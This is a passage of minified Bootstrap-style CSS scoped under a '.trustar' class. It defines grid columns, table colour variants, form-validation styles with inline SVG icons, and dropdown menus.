.col-lg-3{flex:0 0 25%;max-width:25%}.trustar .col-lg-4{flex:0 0 33.33333%;max-width:33.33333%}.trustar .col-lg-5{flex:0 0 41.66667%;max-width:41.66667%}.trustar .col-lg-6{flex:0 0 50%;max-width:50%}.trustar .col-lg-7{flex:0 0 58.33333%;max-width:58.33333%}.trustar .col-lg-8{flex:0 0 66.66667%;max-width:66.66667%}.trustar .col-lg-9{flex:0 0 75%;max-width:75%}.trustar .col-lg-10{flex:0 0 83.33333%;max-width:83.33333%}.trustar .col-lg-11{flex:0 0 91.66667%;max-width:91.66667%}.trustar .col-lg-12{flex:0 0 100%;max-width:100%}.trustar .order-lg-first{order:-1}.trustar .order-lg-last{order:13}.trustar .order-lg-0{order:0}.trustar .order-lg-1{order:1}.trustar .order-lg-2{order:2}.trustar .order-lg-3{order:3}.trustar .order-lg-4{order:4}.trustar .order-lg-5{order:5}.trustar .order-lg-6{order:6}.trustar .order-lg-7{order:7}.trustar .order-lg-8{order:8}.trustar .order-lg-9{order:9}.trustar .order-lg-10{order:10}.trustar .order-lg-11{order:11}.trustar .order-lg-12{order:12}.trustar .offset-lg-0{margin-left:0}.trustar .offset-lg-1{margin-left:8.33333%}.trustar .offset-lg-2{margin-left:16.66667%}.trustar .offset-lg-3{margin-left:25%}.trustar .offset-lg-4{margin-left:33.33333%}.trustar .offset-lg-5{margin-left:41.66667%}.trustar .offset-lg-6{margin-left:50%}.trustar .offset-lg-7{margin-left:58.33333%}.trustar .offset-lg-8{margin-left:66.66667%}.trustar .offset-lg-9{margin-left:75%}.trustar .offset-lg-10{margin-left:83.33333%}.trustar .offset-lg-11{margin-left:91.66667%}}@media (min-width: 1200px){.trustar .col-xl{flex-basis:0;flex-grow:1;max-width:100%}.trustar .col-xl-auto{flex:0 0 auto;width:auto;max-width:100%}.trustar .col-xl-1{flex:0 0 8.33333%;max-width:8.33333%}.trustar .col-xl-2{flex:0 0 16.66667%;max-width:16.66667%}.trustar .col-xl-3{flex:0 0 25%;max-width:25%}.trustar .col-xl-4{flex:0 0 33.33333%;max-width:33.33333%}.trustar .col-xl-5{flex:0 0 41.66667%;max-width:41.66667%}.trustar .col-xl-6{flex:0 0 50%;max-width:50%}.trustar .col-xl-7{flex:0 0 58.33333%;max-width:58.33333%}.trustar .col-xl-8{flex:0 0 66.66667%;max-width:66.66667%}.trustar .col-xl-9{flex:0 0 75%;max-width:75%}.trustar .col-xl-10{flex:0 0 83.33333%;max-width:83.33333%}.trustar .col-xl-11{flex:0 0 91.66667%;max-width:91.66667%}.trustar .col-xl-12{flex:0 0 100%;max-width:100%}.trustar .order-xl-first{order:-1}.trustar .order-xl-last{order:13}.trustar .order-xl-0{order:0}.trustar .order-xl-1{order:1}.trustar .order-xl-2{order:2}.trustar .order-xl-3{order:3}.trustar .order-xl-4{order:4}.trustar .order-xl-5{order:5}.trustar .order-xl-6{order:6}.trustar .order-xl-7{order:7}.trustar .order-xl-8{order:8}.trustar .order-xl-9{order:9}.trustar .order-xl-10{order:10}.trustar .order-xl-11{order:11}.trustar .order-xl-12{order:12}.trustar .offset-xl-0{margin-left:0}.trustar .offset-xl-1{margin-left:8.33333%}.trustar .offset-xl-2{margin-left:16.66667%}.trustar .offset-xl-3{margin-left:25%}.trustar .offset-xl-4{margin-left:33.33333%}.trustar .offset-xl-5{margin-left:41.66667%}.trustar .offset-xl-6{margin-left:50%}.trustar .offset-xl-7{margin-left:58.33333%}.trustar .offset-xl-8{margin-left:66.66667%}.trustar .offset-xl-9{margin-left:75%}.trustar .offset-xl-10{margin-left:83.33333%}.trustar .offset-xl-11{margin-left:91.66667%}}.trustar .table{width:100%;margin-bottom:1rem;background-color:rgba(0,0,0,0)}.trustar .table th,.trustar .table td{padding:.75rem;vertical-align:top;border-top:1px solid #dee2e6}.trustar .table thead th{vertical-align:bottom;border-bottom:2px solid #dee2e6}.trustar .table tbody+tbody{border-top:2px solid #dee2e6}.trustar .table .table{background-color:#fff}.trustar .table-sm th,.trustar .table-sm td{padding:.3rem}.trustar .table-bordered{border:1px solid #dee2e6}.trustar .table-bordered th,.trustar .table-bordered td{border:1px solid #dee2e6}.trustar .table-bordered thead th,.trustar .table-bordered thead td{border-bottom-width:2px}.trustar .table-borderless th,.trustar .table-borderless td,.trustar .table-borderless thead th,.trustar .table-borderless tbody+tbody{border:0}.trustar .table-striped tbody tr:nth-of-type(odd){background-color:rgba(0,0,0,0.05)}.trustar .table-hover tbody tr:hover{background-color:rgba(0,0,0,0.075)}.trustar .table-primary,.trustar .table-primary>th,.trustar .table-primary>td{background-color:#c6d5f3}.trustar .table-primary th,.trustar .table-primary td,.trustar .table-primary thead th,.trustar .table-primary tbody+tbody{border-color:#96b0e9}.trustar .table-hover .table-primary:hover{background-color:#b1c5ef}.trustar .table-hover .table-primary:hover>td,.trustar .table-hover .table-primary:hover>th{background-color:#b1c5ef}.trustar .table-secondary,.trustar .table-secondary>th,.trustar .table-secondary>td{background-color:#ffe3d7}.trustar .table-secondary th,.trustar .table-secondary td,.trustar .table-secondary thead th,.trustar .table-secondary tbody+tbody{border-color:#ffcab4}.trustar .table-hover .table-secondary:hover{background-color:#ffd1be}.trustar .table-hover .table-secondary:hover>td,.trustar .table-hover .table-secondary:hover>th{background-color:#ffd1be}.trustar .table-success,.trustar .table-success>th,.trustar .table-success>td{background-color:#c3e6cb}.trustar .table-success th,.trustar .table-success td,.trustar .table-success thead th,.trustar .table-success tbody+tbody{border-color:#8fd19e}.trustar .table-hover .table-success:hover{background-color:#b1dfbb}.trustar .table-hover .table-success:hover>td,.trustar .table-hover .table-success:hover>th{background-color:#b1dfbb}.trustar .table-info,.trustar .table-info>th,.trustar .table-info>td{background-color:#bee5eb}.trustar .table-info th,.trustar .table-info td,.trustar .table-info thead th,.trustar .table-info tbody+tbody{border-color:#86cfda}.trustar .table-hover .table-info:hover{background-color:#abdde5}.trustar .table-hover .table-info:hover>td,.trustar .table-hover .table-info:hover>th{background-color:#abdde5}.trustar .table-warning,.trustar .table-warning>th,.trustar .table-warning>td{background-color:#ffeeba}.trustar .table-warning th,.trustar .table-warning td,.trustar .table-warning thead th,.trustar .table-warning tbody+tbody{border-color:#ffdf7e}.trustar .table-hover .table-warning:hover{background-color:#ffe8a1}.trustar .table-hover .table-warning:hover>td,.trustar .table-hover .table-warning:hover>th{background-color:#ffe8a1}.trustar .table-danger,.trustar .table-danger>th,.trustar .table-danger>td{background-color:#f5c6cb}.trustar .table-danger th,.trustar .table-danger td,.trustar .table-danger thead th,.trustar .table-danger tbody+tbody{border-color:#ed969e}.trustar .table-hover .table-danger:hover{background-color:#f1b0b7}.trustar .table-hover .table-danger:hover>td,.trustar .table-hover .table-danger:hover>th{background-color:#f1b0b7}.trustar .table-light,.trustar .table-light>th,.trustar .table-light>td{background-color:#f9fafb}.trustar .table-light th,.trustar .table-light td,.trustar .table-light thead th,.trustar .table-light tbody+tbody{border-color:#f4f5f8}.trustar .table-hover .table-light:hover{background-color:#eaedf1}.trustar .table-hover .table-light:hover>td,.trustar .table-hover .table-light:hover>th{background-color:#eaedf1}.trustar .table-dark,.trustar .table-dark>th,.trustar .table-dark>td{background-color:#cbcfd5}.trustar .table-dark th,.trustar .table-dark td,.trustar .table-dark thead th,.trustar .table-dark tbody+tbody{border-color:#9ea6b2}.trustar .table-hover .table-dark:hover{background-color:#bdc2ca}.trustar .table-hover .table-dark:hover>td,.trustar .table-hover .table-dark:hover>th{background-color:#bdc2ca}.trustar .table-brand-primary,.trustar .table-brand-primary>th,.trustar .table-brand-primary>td{background-color:#c6d5f3}.trustar .table-brand-primary th,.trustar .table-brand-primary td,.trustar .table-brand-primary thead th,.trustar .table-brand-primary tbody+tbody{border-color:#96b0e9}.trustar .table-hover .table-brand-primary:hover{background-color:#b1c5ef}.trustar .table-hover .table-brand-primary:hover>td,.trustar .table-hover .table-brand-primary:hover>th{background-color:#b1c5ef}.trustar .table-brand-secondary,.trustar .table-brand-secondary>th,.trustar .table-brand-secondary>td{background-color:#ffe3d7}.trustar .table-brand-secondary th,.trustar .table-brand-secondary td,.trustar .table-brand-secondary thead th,.trustar .table-brand-secondary tbody+tbody{border-color:#ffcab4}.trustar .table-hover .table-brand-secondary:hover{background-color:#ffd1be}.trustar .table-hover .table-brand-secondary:hover>td,.trustar .table-hover .table-brand-secondary:hover>th{background-color:#ffd1be}.trustar .table-functional-success,.trustar .table-functional-success>th,.trustar .table-functional-success>td{background-color:#cad8b9}.trustar .table-functional-success th,.trustar .table-functional-success td,.trustar .table-functional-success thead th,.trustar .table-functional-success tbody+tbody{border-color:#9cb77d}.trustar .table-hover .table-functional-success:hover{background-color:#becfa9}.trustar .table-hover .table-functional-success:hover>td,.trustar .table-hover .table-functional-success:hover>th{background-color:#becfa9}.trustar .table-functional-info,.trustar .table-functional-info>th,.trustar .table-functional-info>td{background-color:#cce0f7}.trustar .table-functional-info th,.trustar .table-functional-info td,.trustar .table-functional-info thead th,.trustar .table-functional-info tbody+tbody{border-color:#a1c5f0}.trustar .table-hover .table-functional-info:hover{background-color:#b6d3f4}.trustar .table-hover .table-functional-info:hover>td,.trustar .table-hover .table-functional-info:hover>th{background-color:#b6d3f4}.trustar .table-functional-warning,.trustar .table-functional-warning>th,.trustar .table-functional-warning>td{background-color:#fce6c1}.trustar .table-functional-warning th,.trustar .table-functional-warning td,.trustar .table-functional-warning thead th,.trustar .table-functional-warning tbody+tbody{border-color:#fad18d}.trustar .table-hover .table-functional-warning:hover{background-color:#fbdca9}.trustar .table-hover .table-functional-warning:hover>td,.trustar .table-hover .table-functional-warning:hover>th{background-color:#fbdca9}.trustar .table-functional-danger,.trustar .table-functional-danger>th,.trustar .table-functional-danger>td{background-color:#f2b8bf}.trustar .table-functional-danger th,.trustar .table-functional-danger td,.trustar .table-functional-danger thead th,.trustar .table-functional-danger tbody+tbody{border-color:#e77b88}.trustar .table-hover .table-functional-danger:hover{background-color:#eea2ac}.trustar .table-hover .table-functional-danger:hover>td,.trustar .table-hover .table-functional-danger:hover>th{background-color:#eea2ac}.trustar .table-functional-accept,.trustar .table-functional-accept>th,.trustar .table-functional-accept>td{background-color:#fff}.trustar .table-functional-accept th,.trustar .table-functional-accept td,.trustar .table-functional-accept thead th,.trustar .table-functional-accept tbody+tbody{border-color:#fff}.trustar .table-hover .table-functional-accept:hover{background-color:#f2f2f2}.trustar .table-hover .table-functional-accept:hover>td,.trustar .table-hover .table-functional-accept:hover>th{background-color:#f2f2f2}.trustar .table-functional-decline,.trustar .table-functional-decline>th,.trustar .table-functional-decline>td{background-color:#fff}.trustar .table-functional-decline th,.trustar .table-functional-decline td,.trustar .table-functional-decline thead th,.trustar .table-functional-decline tbody+tbody{border-color:#fff}.trustar .table-hover .table-functional-decline:hover{background-color:#f2f2f2}.trustar .table-hover .table-functional-decline:hover>td,.trustar .table-hover .table-functional-decline:hover>th{background-color:#f2f2f2}.trustar .table-operational-critical,.trustar .table-operational-critical>th,.trustar .table-operational-critical>td{background-color:#fff}.trustar .table-operational-critical th,.trustar .table-operational-critical td,.trustar .table-operational-critical thead th,.trustar .table-operational-critical tbody+tbody{border-color:#fff}.trustar .table-hover .table-operational-critical:hover{background-color:#f2f2f2}.trustar .table-hover .table-operational-critical:hover>td,.trustar .table-hover .table-operational-critical:hover>th{background-color:#f2f2f2}.trustar .table-operational-error,.trustar .table-operational-error>th,.trustar .table-operational-error>td{background-color:#fff}.trustar .table-operational-error th,.trustar .table-operational-error td,.trustar .table-operational-error thead th,.trustar .table-operational-error tbody+tbody{border-color:#fff}.trustar .table-hover .table-operational-error:hover{background-color:#f2f2f2}.trustar .table-hover .table-operational-error:hover>td,.trustar .table-hover .table-operational-error:hover>th{background-color:#f2f2f2}.trustar .table-operational-warning,.trustar .table-operational-warning>th,.trustar .table-operational-warning>td{background-color:#fff}.trustar .table-operational-warning th,.trustar .table-operational-warning td,.trustar .table-operational-warning thead th,.trustar .table-operational-warning tbody+tbody{border-color:#fff}.trustar .table-hover .table-operational-warning:hover{background-color:#f2f2f2}.trustar .table-hover .table-operational-warning:hover>td,.trustar .table-hover .table-operational-warning:hover>th{background-color:#f2f2f2}.trustar .table-operational-info,.trustar .table-operational-info>th,.trustar .table-operational-info>td{background-color:#fff}.trustar .table-operational-info th,.trustar .table-operational-info td,.trustar .table-operational-info thead th,.trustar .table-operational-info tbody+tbody{border-color:#fff}.trustar .table-hover .table-operational-info:hover{background-color:#f2f2f2}.trustar .table-hover .table-operational-info:hover>td,.trustar .table-hover .table-operational-info:hover>th{background-color:#f2f2f2}.trustar .table-active,.trustar .table-active>th,.trustar .table-active>td{background-color:rgba(0,0,0,0.075)}.trustar .table-hover .table-active:hover{background-color:rgba(0,0,0,0.075)}.trustar .table-hover .table-active:hover>td,.trustar .table-hover .table-active:hover>th{background-color:rgba(0,0,0,0.075)}.trustar .table .thead-dark th{color:#fff;background-color:#212529;border-color:#32383e}.trustar .table .thead-light th{color:#495057;background-color:#e9ecef;border-color:#dee2e6}.trustar .table-dark{color:#fff;background-color:#212529}.trustar .table-dark th,.trustar .table-dark td,.trustar .table-dark thead th{border-color:#32383e}.trustar .table-dark.table-bordered{border:0}.trustar .table-dark.table-striped tbody tr:nth-of-type(odd){background-color:rgba(255,255,255,0.05)}.trustar .table-dark.table-hover tbody tr:hover{background-color:rgba(255,255,255,0.075)}@media (max-width: 575.98px){.trustar .table-responsive-sm{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar .table-responsive-sm>.table-bordered{border:0}}@media (max-width: 767.98px){.trustar .table-responsive-md{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar .table-responsive-md>.table-bordered{border:0}}@media (max-width: 991.98px){.trustar .table-responsive-lg{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar .table-responsive-lg>.table-bordered{border:0}}@media (max-width: 1199.98px){.trustar .table-responsive-xl{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar .table-responsive-xl>.table-bordered{border:0}}.trustar .table-responsive{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.trustar .table-responsive>.table-bordered{border:0}.trustar .form-control{display:block;width:100%;height:calc(2.25rem + 2px);padding:.375rem .75rem;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;background-clip:padding-box;border:1px solid #ced4da;border-radius:.25rem;transition:border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar .form-control{transition:none}}.trustar .form-control::-ms-expand{background-color:transparent;border:0}.trustar .form-control:focus{color:#495057;background-color:#fff;border-color:#80bdff;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .form-control::-webkit-input-placeholder{color:#6c757d;opacity:1}.trustar .form-control:-ms-input-placeholder{color:#6c757d;opacity:1}.trustar .form-control::-ms-input-placeholder{color:#6c757d;opacity:1}.trustar .form-control::placeholder{color:#6c757d;opacity:1}.trustar .form-control:disabled,.trustar .form-control[readonly]{background-color:#e9ecef;opacity:1}.trustar select.form-control:focus::-ms-value{color:#495057;background-color:#fff}.trustar .form-control-file,.trustar .form-control-range{display:block;width:100%}.trustar .col-form-label{padding-top:calc(.375rem + 1px);padding-bottom:calc(.375rem + 1px);margin-bottom:0;font-size:inherit;line-height:1.5}.trustar .col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px);font-size:1.25rem;line-height:1.5}.trustar .col-form-label-sm{padding-top:calc(.25rem + 1px);padding-bottom:calc(.25rem + 1px);font-size:.875rem;line-height:1.5}.trustar .form-control-plaintext{display:block;width:100%;padding-top:.375rem;padding-bottom:.375rem;margin-bottom:0;line-height:1.5;color:#212529;background-color:transparent;border:solid transparent;border-width:1px 0}.trustar .form-control-plaintext.form-control-sm,.trustar .form-control-plaintext.form-control-lg{padding-right:0;padding-left:0}.trustar .form-control-sm{height:calc(1.8125rem + 2px);padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.trustar .form-control-lg{height:calc(2.875rem + 2px);padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.trustar select.form-control[size],.trustar select.form-control[multiple]{height:auto}.trustar textarea.form-control{height:auto}.trustar .form-group{margin-bottom:1rem}.trustar .form-text{display:block;margin-top:.25rem}.trustar .form-row{display:flex;flex-wrap:wrap;margin-right:-5px;margin-left:-5px}.trustar .form-row>.col,.trustar .form-row>[class*=\"col-\"]{padding-right:5px;padding-left:5px}.trustar .form-check{position:relative;display:block;padding-left:1.25rem}.trustar .form-check-input{position:absolute;margin-top:.3rem;margin-left:-1.25rem}.trustar .form-check-input:disabled ~ .form-check-label{color:#6c757d}.trustar .form-check-label{margin-bottom:0}.trustar .form-check-inline{display:inline-flex;align-items:center;padding-left:0;margin-right:.75rem}.trustar .form-check-inline .form-check-input{position:static;margin-top:0;margin-right:.3125rem;margin-left:0}.trustar .valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:80%;color:#28a745}.trustar .valid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;line-height:1.5;color:#fff;background-color:rgba(40,167,69,0.9);border-radius:.25rem}.was-validated .trustar .form-control:valid,.trustar .form-control.is-valid{border-color:#28a745;padding-right:2.25rem;background-repeat:no-repeat;background-position:center right calc(2.25rem / 4);background-size:calc(2.25rem / 2) calc(2.25rem / 2);background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e\")}.was-validated .trustar .form-control:valid:focus,.trustar .form-control.is-valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.was-validated .trustar .form-control:valid ~ .valid-feedback,.was-validated .trustar .form-control:valid ~ .valid-tooltip,.trustar .form-control.is-valid ~ .valid-feedback,.trustar .form-control.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar textarea.form-control:valid,.trustar textarea.form-control.is-valid{padding-right:2.25rem;background-position:top calc(2.25rem / 4) right calc(2.25rem / 4)}.was-validated .trustar .custom-select:valid,.trustar .custom-select.is-valid{border-color:#28a745;padding-right:3.4375rem;background:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e\") no-repeat right .75rem center/8px 10px,url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%2328a745' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e\") no-repeat center right 1.75rem/1.125rem 1.125rem}.was-validated .trustar .custom-select:valid:focus,.trustar .custom-select.is-valid:focus{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.was-validated .trustar .custom-select:valid ~ .valid-feedback,.was-validated .trustar .custom-select:valid ~ .valid-tooltip,.trustar .custom-select.is-valid ~ .valid-feedback,.trustar .custom-select.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar .form-control-file:valid ~ .valid-feedback,.was-validated .trustar .form-control-file:valid ~ .valid-tooltip,.trustar .form-control-file.is-valid ~ .valid-feedback,.trustar .form-control-file.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar .form-check-input:valid ~ .form-check-label,.trustar .form-check-input.is-valid ~ .form-check-label{color:#28a745}.was-validated .trustar .form-check-input:valid ~ .valid-feedback,.was-validated .trustar .form-check-input:valid ~ .valid-tooltip,.trustar .form-check-input.is-valid ~ .valid-feedback,.trustar .form-check-input.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar .custom-control-input:valid ~ .custom-control-label,.trustar .custom-control-input.is-valid ~ .custom-control-label{color:#28a745}.was-validated .trustar .custom-control-input:valid ~ .custom-control-label::before,.trustar .custom-control-input.is-valid ~ .custom-control-label::before{border-color:#28a745}.was-validated .trustar .custom-control-input:valid ~ .valid-feedback,.was-validated .trustar .custom-control-input:valid ~ .valid-tooltip,.trustar .custom-control-input.is-valid ~ .valid-feedback,.trustar .custom-control-input.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar .custom-control-input:valid:checked ~ .custom-control-label::before,.trustar .custom-control-input.is-valid:checked ~ .custom-control-label::before{border-color:#34ce57;background-color:#34ce57}.was-validated .trustar .custom-control-input:valid:focus ~ .custom-control-label::before,.trustar .custom-control-input.is-valid:focus ~ .custom-control-label::before{box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.was-validated .trustar .custom-control-input:valid:focus:not(:checked) ~ .custom-control-label::before,.trustar .custom-control-input.is-valid:focus:not(:checked) ~ .custom-control-label::before{border-color:#28a745}.was-validated .trustar .custom-file-input:valid ~ .custom-file-label,.trustar .custom-file-input.is-valid ~ .custom-file-label{border-color:#28a745}.was-validated .trustar .custom-file-input:valid ~ .valid-feedback,.was-validated .trustar .custom-file-input:valid ~ .valid-tooltip,.trustar .custom-file-input.is-valid ~ .valid-feedback,.trustar .custom-file-input.is-valid ~ .valid-tooltip{display:block}.was-validated .trustar .custom-file-input:valid:focus ~ .custom-file-label,.trustar .custom-file-input.is-valid:focus ~ .custom-file-label{border-color:#28a745;box-shadow:0 0 0 .2rem rgba(40,167,69,0.25)}.trustar .invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:80%;color:#dc3545}.trustar .invalid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.875rem;line-height:1.5;color:#fff;background-color:rgba(220,53,69,0.9);border-radius:.25rem}.was-validated .trustar .form-control:invalid,.trustar .form-control.is-invalid{border-color:#dc3545;padding-right:2.25rem;background-repeat:no-repeat;background-position:center right calc(2.25rem / 4);background-size:calc(2.25rem / 2) calc(2.25rem / 2);background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23dc3545' viewBox='-2 -2 7 7'%3e%3cpath stroke='%23d9534f' d='M0 0l3 3m0-3L0 3'/%3e%3ccircle r='.5'/%3e%3ccircle cx='3' r='.5'/%3e%3ccircle cy='3' r='.5'/%3e%3ccircle cx='3' cy='3' r='.5'/%3e%3c/svg%3E\")}.was-validated .trustar .form-control:invalid:focus,.trustar .form-control.is-invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.was-validated .trustar .form-control:invalid ~ .invalid-feedback,.was-validated .trustar .form-control:invalid ~ .invalid-tooltip,.trustar .form-control.is-invalid ~ .invalid-feedback,.trustar .form-control.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar textarea.form-control:invalid,.trustar textarea.form-control.is-invalid{padding-right:2.25rem;background-position:top calc(2.25rem / 4) right calc(2.25rem / 4)}.was-validated .trustar .custom-select:invalid,.trustar .custom-select.is-invalid{border-color:#dc3545;padding-right:3.4375rem;background:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e\") no-repeat right .75rem center/8px 10px,url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23dc3545' viewBox='-2 -2 7 7'%3e%3cpath stroke='%23d9534f' d='M0 0l3 3m0-3L0 3'/%3e%3ccircle r='.5'/%3e%3ccircle cx='3' r='.5'/%3e%3ccircle cy='3' r='.5'/%3e%3ccircle cx='3' cy='3' r='.5'/%3e%3c/svg%3E\") no-repeat center right 1.75rem/1.125rem 1.125rem}.was-validated .trustar .custom-select:invalid:focus,.trustar .custom-select.is-invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.was-validated .trustar .custom-select:invalid ~ .invalid-feedback,.was-validated .trustar .custom-select:invalid ~ .invalid-tooltip,.trustar .custom-select.is-invalid ~ .invalid-feedback,.trustar .custom-select.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar .form-control-file:invalid ~ .invalid-feedback,.was-validated .trustar .form-control-file:invalid ~ .invalid-tooltip,.trustar .form-control-file.is-invalid ~ .invalid-feedback,.trustar .form-control-file.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar .form-check-input:invalid ~ .form-check-label,.trustar .form-check-input.is-invalid ~ .form-check-label{color:#dc3545}.was-validated .trustar .form-check-input:invalid ~ .invalid-feedback,.was-validated .trustar .form-check-input:invalid ~ .invalid-tooltip,.trustar .form-check-input.is-invalid ~ .invalid-feedback,.trustar .form-check-input.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar .custom-control-input:invalid ~ .custom-control-label,.trustar .custom-control-input.is-invalid ~ .custom-control-label{color:#dc3545}.was-validated .trustar .custom-control-input:invalid ~ .custom-control-label::before,.trustar .custom-control-input.is-invalid ~ .custom-control-label::before{border-color:#dc3545}.was-validated .trustar .custom-control-input:invalid ~ .invalid-feedback,.was-validated .trustar .custom-control-input:invalid ~ .invalid-tooltip,.trustar .custom-control-input.is-invalid ~ .invalid-feedback,.trustar .custom-control-input.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar .custom-control-input:invalid:checked ~ .custom-control-label::before,.trustar .custom-control-input.is-invalid:checked ~ .custom-control-label::before{border-color:#e4606d;background-color:#e4606d}.was-validated .trustar .custom-control-input:invalid:focus ~ .custom-control-label::before,.trustar .custom-control-input.is-invalid:focus ~ .custom-control-label::before{box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.was-validated .trustar .custom-control-input:invalid:focus:not(:checked) ~ .custom-control-label::before,.trustar .custom-control-input.is-invalid:focus:not(:checked) ~ .custom-control-label::before{border-color:#dc3545}.was-validated .trustar .custom-file-input:invalid ~ .custom-file-label,.trustar .custom-file-input.is-invalid ~ .custom-file-label{border-color:#dc3545}.was-validated .trustar .custom-file-input:invalid ~ .invalid-feedback,.was-validated .trustar .custom-file-input:invalid ~ .invalid-tooltip,.trustar .custom-file-input.is-invalid ~ .invalid-feedback,.trustar .custom-file-input.is-invalid ~ .invalid-tooltip{display:block}.was-validated .trustar .custom-file-input:invalid:focus ~ .custom-file-label,.trustar .custom-file-input.is-invalid:focus ~ .custom-file-label{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,0.25)}.trustar .form-inline{display:flex;flex-flow:row wrap;align-items:center}.trustar .form-inline .form-check{width:100%}@media (min-width: 576px){.trustar .form-inline label{display:flex;align-items:center;justify-content:center;margin-bottom:0}.trustar .form-inline .form-group{display:flex;flex:0 0 auto;flex-flow:row wrap;align-items:center;margin-bottom:0}.trustar .form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.trustar .form-inline .form-control-plaintext{display:inline-block}.trustar .form-inline .input-group,.trustar .form-inline .custom-select{width:auto}.trustar .form-inline .form-check{display:flex;align-items:center;justify-content:center;width:auto;padding-left:0}.trustar .form-inline .form-check-input{position:relative;margin-top:0;margin-right:.25rem;margin-left:0}.trustar .form-inline .custom-control{align-items:center;justify-content:center}.trustar .form-inline .custom-control-label{margin-bottom:0}}.trustar .fade{transition:opacity 0.15s linear}@media screen and (prefers-reduced-motion: reduce){.trustar .fade{transition:none}}.trustar .fade:not(.show){opacity:0}.trustar .collapse:not(.show){display:none}.trustar .collapsing{position:relative;height:0;overflow:hidden;transition:height 0.35s ease}@media screen and (prefers-reduced-motion: reduce){.trustar .collapsing{transition:none}}.trustar .dropup,.trustar .dropright,.trustar .dropdown,.trustar .dropleft{position:relative}.trustar .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\";border-top:.3em solid;border-right:.3em solid transparent;border-bottom:0;border-left:.3em solid transparent}.trustar .dropdown-toggle:empty::after{margin-left:0}.trustar .dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:10rem;padding:.5rem 0;margin:.125rem 0 0;font-size:1rem;color:#212529;text-align:left;list-style:none;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,0.15);border-radius:.25rem}.trustar .dropdown-menu-right{right:0;left:auto}@media (min-width: 576px){.trustar .dropdown-menu-sm-right{right:0;left:auto}}@media (min-width: 768px){.trustar .dropdown-menu-md-right{right:0;left:auto}}@media (min-width: 992px){.trustar .dropdown-menu-lg-right{right:0;left:auto}}@media (min-width: 1200px){.trustar .dropdown-menu-xl-right{right:0;left:auto}}.trustar .dropdown-menu-left{right:auto;left:0}@media (min-width: 576px){.trustar .dropdown-menu-sm-left{right:auto;left:0}}@media (min-width: 768px){.trustar .dropdown-menu-md-left{right:auto;left:0}}@media (min-width: 992px){.trustar .dropdown-menu-lg-left{right:auto;left:0}}@media (min-width: 1200px){.trustar .dropdown-menu-xl-left{right:auto;left:0}}.trustar .dropup .dropdown-menu{top:auto;bottom:100%;margin-top:0;margin-bottom:.125rem}.trustar .dropup .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\";border-top:0;border-right:.3em solid transparent;border-bottom:.3em 